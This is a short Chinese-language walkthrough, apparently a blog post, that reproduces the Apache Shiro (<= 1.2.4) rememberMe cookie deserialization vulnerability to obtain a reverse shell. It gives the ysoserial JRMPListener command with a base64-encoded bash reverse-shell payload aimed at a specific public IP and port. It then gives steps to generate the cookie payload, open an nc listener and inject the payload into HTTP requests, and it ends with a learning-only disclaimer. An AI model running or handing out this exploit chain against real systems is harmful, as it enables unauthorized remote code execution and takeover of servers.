Apache shiro 反序列化漏洞复现（反弹 shell）

0x01 影响版本

Apache Shiro <= 1.2.4

0x02 漏洞位置

http 请求包 cookie 中的 rememberMe 参数。

0x03 漏洞复现

1. 在公网 vps 执行下列命令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反
弹 shell 的命令"

这里的命令，需要使用 Java Runtime 配合 bash 编码。
在线转换地址

最终执行命令为：

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4
"bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzUuMjEyLjExOC8xMjM0IDA+JiAx}|{
base64,-d}|{bash,-i}"

理论上，这里的 CommonsCollections4 也可以换成 CommonsCollections2

2. 使用 exp 生成 payload。（我这里是在本地 kali 下运行的）
   python exp.py 公网 vps:1099
   
3. 公网 vps 开启 nc 监听。
   
4. 抓任意 http 数据包，在 cookie 中追加 payload。
   
5. 反弹shell。
   

注：本文仅供参考学习，请勿在网上搞破坏，触犯法律者应承担相应的法律责任！